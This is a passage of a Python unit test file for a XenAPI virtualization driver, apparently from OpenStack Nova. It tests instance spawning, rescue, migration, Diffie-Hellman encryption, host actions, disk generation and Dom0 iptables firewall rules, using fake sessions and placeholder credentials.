        self._test_spawn(1, 2, 3, check_injection=True)

        # tee must not run in this case, where an injection-capable
        # guest agent is detected
        self.assertFalse(self._tee_executed)

    def test_spawn_vlanmanager(self):
        self.flags(image_service='nova.image.glance.GlanceImageService',
                   network_manager='nova.network.manager.VlanManager',
                   vlan_interface='fake0')

        def dummy(*args, **kwargs):
            pass

        self.stubs.Set(vmops.VMOps, '_create_vifs', dummy)
        # Reset network table
        xenapi_fake.reset_table('network')
        # Instance id = 2 will use vlan network (see db/fakes.py)
        ctxt = self.context.elevated()
        instance = self._create_instance(2, False)
        networks = self.network.db.network_get_all(ctxt)
        for network in networks:
            self.network.set_network_host(ctxt, network)

        self.network.allocate_for_instance(ctxt,
                          instance_id=2,
                          instance_uuid="00000000-0000-0000-0000-000000000000",
                          host=FLAGS.host,
                          vpn=None,
                          rxtx_factor=3,
                          project_id=self.project_id)
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK,
                         instance_id=2,
                         create_record=False)
        # TODO(salvatore-orlando): a complete test here would require
        # a check for making sure the bridge for the VM's VIF is
        # consistent with bridge specified in nova db

    def test_spawn_with_network_qos(self):
        self._create_instance()
        # Every VIF should carry the ratelimit QoS parameters.
        for vif_ref in xenapi_fake.get_all('VIF'):
            vif_rec = xenapi_fake.get_record('VIF', vif_ref)
            self.assertEquals(vif_rec['qos_algorithm_type'], 'ratelimit')
            self.assertEquals(vif_rec['qos_algorithm_params']['kbps'],
                              str(3 * 1024))

    def test_rescue(self):
        instance = self._create_instance()
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        vm = vm_utils.VMHelper.lookup(session, instance.name)
        vbd = xenapi_fake.create_vbd(vm, None)
        conn = xenapi_conn.get_connection(False)
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        conn.rescue(self.context, instance, [], image_meta)

    def test_unrescue(self):
        instance = self._create_instance()
        conn = xenapi_conn.get_connection(False)
        # Unrescue expects the original instance to be powered off
        conn.power_off(instance)
        rescue_vm = xenapi_fake.create_vm(instance.name + '-rescue', 'Running')
        conn.unrescue(instance, None)

    def test_unrescue_not_in_rescue(self):
        instance = self._create_instance()
        conn = xenapi_conn.get_connection(False)
        # Ensure that it will not unrescue a non-rescued instance.
        self.assertRaises(exception.InstanceNotInRescueMode, conn.unrescue,
                          instance, None)

    def test_finish_revert_migration(self):
        instance = self._create_instance()

        class VMOpsMock():
            # Minimal stand-in that just records the call.

            def __init__(self):
                self.finish_revert_migration_called = False

            def finish_revert_migration(self, instance):
                self.finish_revert_migration_called = True

        conn = xenapi_conn.get_connection(False)
        conn._vmops = VMOpsMock()
        conn.finish_revert_migration(instance, None)
        self.assertTrue(conn._vmops.finish_revert_migration_called)

    def _create_instance(self, instance_id=1, spawn=True):
        """Creates and spawns a test instance."""
        instance_values = {
            'id': instance_id,
            'project_id': self.project_id,
            'user_id': self.user_id,
            'image_ref': 1,
            'kernel_id': 2,
            'ramdisk_id': 3,
            'root_gb': 20,
            'instance_type_id': '3',  # m1.large
            'os_type': 'linux',
            'architecture': 'x86-64'}
        instance = db.instance_create(self.context, instance_values)
        network_info = [({'bridge': 'fa0', 'id': 0,
                          'injected': False,
                          'cidr': '192.168.0.0/24',
                          'cidr_v6': 'dead:beef::1/120',
                          },
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'dhcp_server': '192.168.0.1',
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        if spawn:
            instance.admin_pass = 'herp'
            self.conn.spawn(self.context, instance, image_meta, network_info)
        return instance


class XenAPIDiffieHellmanTestCase(test.TestCase):
    """Unit tests for Diffie-Hellman code."""
    def setUp(self):
        super(XenAPIDiffieHellmanTestCase, self).setUp()
        # Two independent parties for the key exchange.
        self.alice = vmops.SimpleDH()
        self.bob = vmops.SimpleDH()

    def test_shared(self):
        # Exchanging public keys must yield the same shared secret on
        # both sides.
        shared_by_alice = self.alice.compute_shared(self.bob.get_public())
        shared_by_bob = self.bob.compute_shared(self.alice.get_public())
        self.assertEquals(shared_by_alice, shared_by_bob)

    def _test_encryption(self, message):
        """Round-trip *message* from alice to bob and check it survives."""
        ciphertext = self.alice.encrypt(message)
        self.assertFalse(ciphertext.endswith('\n'))
        self.assertEquals(self.bob.decrypt(ciphertext), message)

    def test_encrypt_simple_message(self):
        self._test_encryption('This is a simple message.')

    def test_encrypt_message_with_newlines_at_end(self):
        self._test_encryption('This message has a newline at the end.\n')

    def test_encrypt_many_newlines_at_end(self):
        self._test_encryption('Message with lotsa newlines.\n\n\n')

    def test_encrypt_newlines_inside_message(self):
        self._test_encryption('Message\nwith\ninterior\nnewlines.')

    def test_encrypt_with_leading_newlines(self):
        self._test_encryption('\n\nMessage with leading newlines.')

    def test_encrypt_really_long_message(self):
        # 4 KiB payload, same bytes as joining 1024 copies of 'abcd'.
        self._test_encryption('abcd' * 1024)


class XenAPIMigrateInstance(test.TestCase):
    """Unit test for verifying migration-related actions."""

    def setUp(self):
        super(XenAPIMigrateInstance, self).setUp()
        self.flags(target_host='127.0.0.1',
                xenapi_connection_url='test_url',
                xenapi_connection_password='test_pass',
                firewall_driver='nova.virt.xenapi.firewall.'
                                'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        xenapi_fake.create_network('fake', FLAGS.flat_network_bridge)
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': None,
                  'ramdisk_id': None,
                  'root_gb': 5,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        migration_values = {
            'source_compute': 'nova-compute',
            'dest_compute': 'nova-compute',
            'dest_host': '10.127.5.114',
            'status': 'post-migrating',
            'instance_uuid': '15f23e6a-cc6e-4d22-b651-d9bdaac316f7',
            'old_instance_type_id': 5,
            'new_instance_type_id': 1
        }
        self.migration = db.migration_create(
            context.get_admin_context(), migration_values)

        fake_utils.stub_out_utils_execute(self.stubs)
        stubs.stub_out_migration_methods(self.stubs)
        stubs.stubout_get_this_vm_uuid(self.stubs)
        glance_stubs.stubout_glance_client(self.stubs)

    def _fake_network_info(self):
        """Return the single-NIC legacy network_info used by these tests.

        This (network, info) tuple list was previously duplicated inline
        in every finish_migration test below; build it in one place so the
        fixtures cannot drift apart.
        """
        return [({'bridge': 'fa0', 'id': 0, 'injected': False},
                 {'broadcast': '192.168.0.255',
                  'dns': ['192.168.0.1'],
                  'gateway': '192.168.0.1',
                  'gateway_v6': 'dead:beef::1',
                  'ip6s': [{'enabled': '1',
                            'ip': 'dead:beef::dcad:beff:feef:0',
                            'netmask': '64'}],
                  'ips': [{'enabled': '1',
                           'ip': '192.168.0.100',
                           'netmask': '255.255.255.0'}],
                  'label': 'fake',
                  'mac': 'DE:AD:BE:EF:00:00',
                  'rxtx_cap': 3})]

    def test_resize_xenserver_6(self):
        """On XenServer 6.x the offline VDI_resize call is used."""
        instance = db.instance_create(self.context, self.instance_values)
        called = {'resize': False}

        def fake_vdi_resize(*args, **kwargs):
            called['resize'] = True

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize", fake_vdi_resize)
        # Re-stub the session so it reports a 6.0.0 product version.
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests,
                              product_version=(6, 0, 0))
        conn = xenapi_conn.get_connection(False)
        vdi_ref = xenapi_fake.create_vdi('hurr', 'fake')
        vdi_uuid = xenapi_fake.get_record('VDI', vdi_ref)['uuid']
        conn._vmops._resize_instance(instance, vdi_uuid)
        self.assertEqual(called['resize'], True)

    def test_migrate_disk_and_power_off(self):
        """A running VM can be migrated off-host without errors."""
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        instance_type = db.instance_type_get_by_name(self.context, 'm1.large')
        conn = xenapi_conn.get_connection(False)
        conn.migrate_disk_and_power_off(self.context, instance,
                                        '127.0.0.1', instance_type, None)

    def test_migrate_disk_and_power_off_passes_exceptions(self):
        """Errors raised while migrating VHDs propagate to the caller."""
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        instance_type = db.instance_type_get_by_name(self.context, 'm1.large')

        def fake_raise(*args, **kwargs):
            raise exception.MigrationError(reason='test failure')
        self.stubs.Set(vmops.VMOps, "_migrate_vhd", fake_raise)

        conn = xenapi_conn.get_connection(False)
        self.assertRaises(exception.MigrationError,
                          conn.migrate_disk_and_power_off,
                          self.context, instance,
                          '127.0.0.1', instance_type, None)

    def test_revert_migrate(self):
        """finish_migration resizes/starts, then revert undoes it."""
        instance = db.instance_create(self.context, self.instance_values)
        self.called = False
        self.fake_vm_start_called = False
        self.fake_finish_revert_migration_called = False

        def fake_vm_start(*args, **kwargs):
            self.fake_vm_start_called = True

        def fake_vdi_resize(*args, **kwargs):
            self.called = True

        def fake_finish_revert_migration(*args, **kwargs):
            self.fake_finish_revert_migration_called = True

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        self.stubs.Set(vmops.VMOps, '_start', fake_vm_start)
        self.stubs.Set(vmops.VMOps, 'finish_revert_migration',
                       fake_finish_revert_migration)

        conn = xenapi_conn.get_connection(False)
        network_info = self._fake_network_info()
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        base = xenapi_fake.create_vdi('hurr', 'fake')
        base_uuid = xenapi_fake.get_record('VDI', base)['uuid']
        cow = xenapi_fake.create_vdi('durr', 'fake')
        cow_uuid = xenapi_fake.get_record('VDI', cow)['uuid']
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy=base_uuid, cow=cow_uuid),
                              network_info, image_meta, resize_instance=True)
        self.assertEqual(self.called, True)
        self.assertEqual(self.fake_vm_start_called, True)

        conn.finish_revert_migration(instance, network_info)
        self.assertEqual(self.fake_finish_revert_migration_called, True)

    def test_finish_migrate(self):
        """finish_migration with resize_instance=True resizes and starts."""
        instance = db.instance_create(self.context, self.instance_values)
        self.called = False
        self.fake_vm_start_called = False

        def fake_vm_start(*args, **kwargs):
            self.fake_vm_start_called = True

        def fake_vdi_resize(*args, **kwargs):
            self.called = True

        self.stubs.Set(vmops.VMOps, '_start', fake_vm_start)
        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)

        conn = xenapi_conn.get_connection(False)
        network_info = self._fake_network_info()
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=True)
        self.assertEqual(self.called, True)
        self.assertEqual(self.fake_vm_start_called, True)

    def test_finish_migrate_no_local_storage(self):
        """No VDI resize is attempted for instances with root_gb=0."""
        tiny_type = instance_types.get_instance_type_by_name('m1.tiny')
        tiny_type_id = tiny_type['id']
        self.instance_values.update({'instance_type_id': tiny_type_id,
                                     'root_gb': 0})
        instance = db.instance_create(self.context, self.instance_values)

        def fake_vdi_resize(*args, **kwargs):
            raise Exception("This shouldn't be called")

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        conn = xenapi_conn.get_connection(False)
        network_info = self._fake_network_info()
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=True)

    def test_finish_migrate_no_resize_vdi(self):
        """No VDI resize is attempted when resize_instance is False."""
        instance = db.instance_create(self.context, self.instance_values)

        def fake_vdi_resize(*args, **kwargs):
            raise Exception("This shouldn't be called")

        self.stubs.Set(stubs.FakeSessionForVMTests,
                       "VDI_resize_online", fake_vdi_resize)
        conn = xenapi_conn.get_connection(False)
        network_info = self._fake_network_info()

        # Resize instance would be determined by the compute call
        image_meta = {'id': instance.image_ref, 'disk_format': 'vhd'}
        conn.finish_migration(self.context, self.migration, instance,
                              dict(base_copy='hurr', cow='durr'),
                              network_info, image_meta, resize_instance=False)


class XenAPIImageTypeTestCase(test.TestCase):
    """Round-trip tests for the ImageType id/string conversions."""

    def test_to_string(self):
        """A type id converts to its canonical string form."""
        converted = vm_utils.ImageType.to_string(vm_utils.ImageType.KERNEL)
        self.assertEquals(converted, vm_utils.ImageType.KERNEL_STR)

    def test_from_string(self):
        """A type string converts back to the matching id."""
        converted = vm_utils.ImageType.from_string(
            vm_utils.ImageType.KERNEL_STR)
        self.assertEquals(converted, vm_utils.ImageType.KERNEL)


class XenAPIDetermineDiskImageTestCase(test.TestCase):
    """Unit tests for code that detects the ImageType."""

    def setUp(self):
        super(XenAPIDetermineDiskImageTestCase, self).setUp()
        glance_stubs.stubout_glance_client(self.stubs)

        class FakeInstance(object):
            pass

        instance = FakeInstance()
        instance.id = 42
        instance.os_type = 'linux'
        instance.architecture = 'x86-64'
        self.fake_instance = instance

    def assert_disk_type(self, image_meta, expected_disk_type):
        """Assert that *image_meta* is detected as *expected_disk_type*."""
        detected = vm_utils.VMHelper.determine_disk_image_type(image_meta)
        self.assertEqual(expected_disk_type, detected)

    def test_machine(self):
        # 'ami' maps to a plain machine disk image.
        self.assert_disk_type({'id': 'a', 'disk_format': 'ami'},
                              vm_utils.ImageType.DISK)

    def test_raw(self):
        self.assert_disk_type({'id': 'a', 'disk_format': 'raw'},
                              vm_utils.ImageType.DISK_RAW)

    def test_vhd(self):
        self.assert_disk_type({'id': 'a', 'disk_format': 'vhd'},
                              vm_utils.ImageType.DISK_VHD)


class CompareVersionTestCase(test.TestCase):
    """Exercises the ordering semantics of vmops.cmp_version."""

    def test_less_than(self):
        """cmp_version orders a strictly before b"""
        self.assertTrue(0 > vmops.cmp_version('1.2.3.4', '1.2.3.5'))

    def test_greater_than(self):
        """cmp_version orders a strictly after b"""
        self.assertTrue(0 < vmops.cmp_version('1.2.3.5', '1.2.3.4'))

    def test_equal(self):
        """cmp_version reports identical versions as equal"""
        self.assertTrue(0 == vmops.cmp_version('1.2.3.4', '1.2.3.4'))

    def test_non_lexical(self):
        """cmp_version compares components numerically, not lexically"""
        self.assertTrue(0 < vmops.cmp_version('1.2.3.10', '1.2.3.4'))

    def test_length(self):
        """cmp_version falls back to component count as the tiebreaker"""
        self.assertTrue(0 > vmops.cmp_version('1.2.3', '1.2.3.4'))


class XenAPIHostTestCase(test.TestCase):
    """Tests HostState, which holds metrics from XenServer that get
    reported back to the Schedulers."""

    def setUp(self):
        super(XenAPIHostTestCase, self).setUp()
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        self.conn = xenapi_conn.get_connection(False)

    def test_host_state(self):
        # The fake session reports fixed metric values; check each one.
        stats = self.conn.get_host_stats()
        expectations = {'disk_total': 10000,
                        'disk_used': 20000,
                        'host_memory_total': 10,
                        'host_memory_overhead': 20,
                        'host_memory_free': 30,
                        'host_memory_free_computed': 40}
        for key, value in expectations.items():
            self.assertEquals(stats[key], value)

    def _test_host_action(self, method, action, expected=None):
        """Call *method* with *action* and verify the returned value.

        When *expected* is not given the call is expected to echo the
        action back.
        """
        outcome = method('host', action)
        self.assertEqual(outcome, expected or action)

    def test_host_reboot(self):
        self._test_host_action(self.conn.host_power_action, 'reboot')

    def test_host_shutdown(self):
        self._test_host_action(self.conn.host_power_action, 'shutdown')

    def test_host_startup(self):
        # Powering a host on is not supported through XenAPI.
        self.assertRaises(NotImplementedError,
                          self.conn.host_power_action, 'host', 'startup')

    def test_host_maintenance_on(self):
        self._test_host_action(self.conn.host_maintenance_mode,
                               True, 'on_maintenance')

    def test_host_maintenance_off(self):
        self._test_host_action(self.conn.host_maintenance_mode,
                               False, 'off_maintenance')

    def test_set_enable_host_enable(self):
        self._test_host_action(self.conn.set_host_enabled, True, 'enabled')

    def test_set_enable_host_disable(self):
        self._test_host_action(self.conn.set_host_enabled, False, 'disabled')


class XenAPIAutoDiskConfigTestCase(test.TestCase):
    """Tests whether _attach_disks triggers a root-partition resize
    depending on the instance's auto_disk_config setting."""

    def setUp(self):
        super(XenAPIAutoDiskConfigTestCase, self).setUp()
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

        self.user_id = 'fake'
        self.project_id = 'fake'

        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        self.context = context.RequestContext(self.user_id, self.project_id)

        # VBD creation is irrelevant to these tests; replace it with a
        # no-op so _attach_disks can run against fake refs.  Defined as a
        # classmethod to match the signature of the method being stubbed.
        @classmethod
        def fake_create_vbd(cls, session, vm_ref, vdi_ref, userdevice,
                            vbd_type='disk', read_only=False, bootable=True):
            pass

        self.stubs.Set(vm_utils.VMHelper,
                       "create_vbd",
                       fake_create_vbd)

    def assertIsPartitionCalled(self, called):
        """Run _attach_disks and assert whether the partition/filesystem
        resize helper was invoked (``called`` is the expected boolean)."""
        marker = {"partition_called": False}

        # Record the call instead of actually resizing anything.
        def fake_resize_part_and_fs(dev, start, old, new):
            marker["partition_called"] = True
        self.stubs.Set(vm_utils, "_resize_part_and_fs",
                       fake_resize_part_and_fs)

        instance = db.instance_create(self.context, self.instance_values)
        disk_image_type = vm_utils.ImageType.DISK_VHD
        # Opaque refs are never dereferenced thanks to the stubs above.
        vm_ref = "blah"
        first_vdi_ref = "blah"
        vdis = ["blah"]

        self.conn._vmops._attach_disks(
            instance, disk_image_type, vm_ref, first_vdi_ref, vdis)

        self.assertEqual(marker["partition_called"], called)

    def test_instance_not_auto_disk_config(self):
        """Should not partition unless instance is marked as
        auto_disk_config.
        """
        self.instance_values['auto_disk_config'] = False
        self.assertIsPartitionCalled(False)

    @stub_vm_utils_with_vdi_attached_here
    def test_instance_auto_disk_config_doesnt_pass_fail_safes(self):
        """Should not partition unless fail safes pass"""
        self.instance_values['auto_disk_config'] = True

        # Two partitions on the disk: the fail-safe check should refuse
        # to resize.
        def fake_get_partitions(dev):
            return [(1, 0, 100, 'ext4'), (2, 100, 200, 'ext4')]
        self.stubs.Set(vm_utils, "_get_partitions",
                       fake_get_partitions)

        self.assertIsPartitionCalled(False)

    @stub_vm_utils_with_vdi_attached_here
    def test_instance_auto_disk_config_passes_fail_safes(self):
        """Should partition if instance is marked as auto_disk_config=True and
        virt-layer specific fail-safe checks pass.
        """
        self.instance_values['auto_disk_config'] = True

        # A single ext4 partition satisfies the fail-safe check.
        def fake_get_partitions(dev):
            return [(1, 0, 100, 'ext4')]
        self.stubs.Set(vm_utils, "_get_partitions",
                       fake_get_partitions)

        self.assertIsPartitionCalled(True)


class XenAPIGenerateLocal(test.TestCase):
    """Test generating of local disks, like swap and ephemeral"""
    def setUp(self):
        super(XenAPIGenerateLocal, self).setUp()
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   xenapi_generate_swap=True,
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

        self.user_id = 'fake'
        self.project_id = 'fake'

        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        self.context = context.RequestContext(self.user_id, self.project_id)

        # VBD creation is irrelevant to these tests; replace it with a
        # no-op so _attach_disks can run against fake refs.  Defined as a
        # classmethod to match the signature of the method being stubbed.
        @classmethod
        def fake_create_vbd(cls, session, vm_ref, vdi_ref, userdevice,
                            vbd_type='disk', read_only=False, bootable=True):
            pass

        self.stubs.Set(vm_utils.VMHelper,
                       "create_vbd",
                       fake_create_vbd)

    def assertCalled(self, instance):
        """Run _attach_disks for *instance* and assert that the stubbed
        disk-generation helper (set by the calling test) was invoked."""
        disk_image_type = vm_utils.ImageType.DISK_VHD
        # Opaque refs are never dereferenced thanks to the stubs above.
        vm_ref = "blah"
        first_vdi_ref = "blah"
        vdis = ["blah"]

        self.called = False
        self.conn._vmops._attach_disks(instance, disk_image_type,
                                       vm_ref, first_vdi_ref, vdis)
        self.assertTrue(self.called)

    def test_generate_swap(self):
        """Test swap disk generation."""
        instance = db.instance_create(self.context, self.instance_values)
        # Switch to an instance type that carries swap space.
        instance = db.instance_update(self.context, instance['id'],
                                      {'instance_type_id': 5})

        @classmethod
        def fake_generate_swap(cls, *args, **kwargs):
            self.called = True
        self.stubs.Set(vm_utils.VMHelper, 'generate_swap',
                       fake_generate_swap)

        self.assertCalled(instance)

    def test_generate_ephemeral(self):
        """Test ephemeral disk generation."""
        instance = db.instance_create(self.context, self.instance_values)
        # Switch to an instance type that carries ephemeral storage.
        instance = db.instance_update(self.context, instance['id'],
                                      {'instance_type_id': 4})

        @classmethod
        def fake_generate_ephemeral(cls, *args):
            self.called = True
        self.stubs.Set(vm_utils.VMHelper, 'generate_ephemeral',
                       fake_generate_ephemeral)

        self.assertCalled(instance)


class XenAPIBWUsageTestCase(test.TestCase):
    """Bandwidth-usage reporting tests for the XenAPI driver."""

    def setUp(self):
        super(XenAPIBWUsageTestCase, self).setUp()
        # Force metrics compilation to fail for every instance.
        self.stubs.Set(vm_utils.VMHelper, "compile_metrics",
                       XenAPIBWUsageTestCase._fake_compile_metrics)
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

    @classmethod
    def _fake_compile_metrics(cls, start_time, stop_time=None):
        raise exception.CouldNotFetchMetrics()

    def test_get_all_bw_usage_in_failure_case(self):
        """Test that get_all_bw_usage returns an empty list when metrics
        compilation failed.  c.f. bug #910045.
        """
        class FakeInstance(object):
            def __init__(self):
                self.name = "instance-0001"
                self.uuid = "1-2-3-4-5"

        usage = self.conn.get_all_bw_usage(
            [FakeInstance()], datetime.datetime.utcnow())
        self.assertEqual(usage, [])


# TODO(salvatore-orlando): this class and
# nova.tests.test_libvirt.IPTablesFirewallDriverTestCase share a lot of code.
# Consider abstracting common code in a base class for firewall driver testing.
class XenAPIDom0IptablesFirewallTestCase(test.TestCase):

    # Canned ``iptables-save`` NAT-table output used to seed the fake
    # firewall state before the driver applies its own rules.
    _in_nat_rules = [
      '# Generated by iptables-save v1.4.10 on Sat Feb 19 00:03:19 2011',
      '*nat',
      ':PREROUTING ACCEPT [1170:189210]',
      ':INPUT ACCEPT [844:71028]',
      ':OUTPUT ACCEPT [5149:405186]',
      ':POSTROUTING ACCEPT [5063:386098]',
    ]

    # Canned IPv4 filter-table output, including pre-existing non-nova
    # rules that the driver must preserve (see _validate_security_group).
    _in_filter_rules = [
      '# Generated by iptables-save v1.4.4 on Mon Dec  6 11:54:13 2010',
      '*filter',
      ':INPUT ACCEPT [969615:281627771]',
      ':FORWARD ACCEPT [0:0]',
      ':OUTPUT ACCEPT [915599:63811649]',
      ':nova-block-ipv4 - [0:0]',
      '-A INPUT -i virbr0 -p tcp -m tcp --dport 67 -j ACCEPT ',
      '-A FORWARD -d 192.168.122.0/24 -o virbr0 -m state --state RELATED'
      ',ESTABLISHED -j ACCEPT ',
      '-A FORWARD -s 192.168.122.0/24 -i virbr0 -j ACCEPT ',
      '-A FORWARD -i virbr0 -o virbr0 -j ACCEPT ',
      '-A FORWARD -o virbr0 -j REJECT --reject-with icmp-port-unreachable ',
      '-A FORWARD -i virbr0 -j REJECT --reject-with icmp-port-unreachable ',
      'COMMIT',
      '# Completed on Mon Dec  6 11:54:13 2010',
    ]

    # Canned ``ip6tables-save`` filter-table output for the IPv6 tests.
    _in6_filter_rules = [
      '# Generated by ip6tables-save v1.4.4 on Tue Jan 18 23:47:56 2011',
      '*filter',
      ':INPUT ACCEPT [349155:75810423]',
      ':FORWARD ACCEPT [0:0]',
      ':OUTPUT ACCEPT [349256:75777230]',
      'COMMIT',
      '# Completed on Tue Jan 18 23:47:56 2011',
    ]

    def setUp(self):
        """Wire up a fake XenAPI session and the Dom0 iptables firewall
        driver under test."""
        super(XenAPIDom0IptablesFirewallTestCase, self).setUp()
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        xenapi_fake.create_local_pifs()
        self.user_id = 'mappin'
        self.project_id = 'fake'
        # The firewall session stub records applied rules on this test
        # case (it receives test_case=self).
        stubs.stubout_session(self.stubs, stubs.FakeSessionForFirewallTests,
                              test_case=self)
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.network = importutils.import_object(FLAGS.network_manager)
        self.conn = xenapi_conn.get_connection(False)
        # Object under test: the driver's Dom0 iptables firewall.
        self.fw = self.conn._vmops.firewall_driver

    def _create_instance_ref(self):
        """Insert and return a minimal instance row for the test user."""
        values = {'user_id': self.user_id,
                  'project_id': self.project_id,
                  'instance_type_id': 1}
        return db.instance_create(self.context, values)

    def _create_test_security_group(self):
        """Create 'testgroup' with ICMP and TCP ingress rules attached."""
        admin_ctxt = context.get_admin_context()
        secgroup = db.security_group_create(admin_ctxt,
                                {'user_id': self.user_id,
                                 'project_id': self.project_id,
                                 'name': 'testgroup',
                                 'description': 'test group'})
        rule_specs = [
            # All ICMP from 192.168.11.0/24.
            ('icmp', -1, -1, '192.168.11.0/24'),
            # ICMP echo request (type 8) from 192.168.11.0/24.
            ('icmp', 8, -1, '192.168.11.0/24'),
            # TCP ports 80-81 from 192.168.10.0/24.
            ('tcp', 80, 81, '192.168.10.0/24'),
        ]
        for protocol, from_port, to_port, cidr in rule_specs:
            db.security_group_rule_create(admin_ctxt,
                                          {'parent_group_id': secgroup['id'],
                                           'protocol': protocol,
                                           'from_port': from_port,
                                           'to_port': to_port,
                                           'cidr': cidr})
        return secgroup

    def _validate_security_group(self):
        """Check that self._out_rules (captured by the firewall session
        stub) preserves pre-existing rules and contains the chains and
        acceptance rules for the group built by
        _create_test_security_group."""
        # Every pre-existing non-nova rule must survive untouched.
        in_rules = filter(lambda l: not l.startswith('#'),
                          self._in_filter_rules)
        for rule in in_rules:
            if not 'nova' in rule:
                self.assertTrue(rule in self._out_rules,
                                'Rule went missing: %s' % rule)

        instance_chain = None
        for rule in self._out_rules:
            # This is pretty crude, but it'll do for now
            # last two octets change
            if re.search('-d 192.168.[0-9]{1,3}.[0-9]{1,3} -j', rule):
                instance_chain = rule.split(' ')[-1]
                break
        self.assertTrue(instance_chain, "The instance chain wasn't added")
        security_group_chain = None
        for rule in self._out_rules:
            # This is pretty crude, but it'll do for now
            if '-A %s -j' % instance_chain in rule:
                security_group_chain = rule.split(' ')[-1]
                break
        self.assertTrue(security_group_chain,
                        "The security group chain wasn't added")

        # One acceptance rule per security-group rule created in
        # _create_test_security_group: all-ICMP, ICMP echo, TCP 80-81.
        regex = re.compile('-A .* -j ACCEPT -p icmp -s 192.168.11.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "ICMP acceptance rule wasn't added")

        regex = re.compile('-A .* -j ACCEPT -p icmp -m icmp --icmp-type 8'
                           ' -s 192.168.11.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "ICMP Echo Request acceptance rule wasn't added")

        regex = re.compile('-A .* -j ACCEPT -p tcp --dport 80:81'
                           ' -s 192.168.10.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "TCP port 80/81 acceptance rule wasn't added")

    def test_static_filters(self):
        """End-to-end check that preparing/applying instance filters emits
        the expected iptables rules, including a group-to-group rule that
        accepts TCP 80-81 from members of the source group."""
        instance_ref = self._create_instance_ref()
        src_instance_ref = self._create_instance_ref()
        admin_ctxt = context.get_admin_context()
        secgroup = self._create_test_security_group()

        # Second group whose *members* (not a CIDR) are allowed to reach
        # TCP 80-81 on members of 'testgroup'.
        src_secgroup = db.security_group_create(admin_ctxt,
                                                {'user_id': self.user_id,
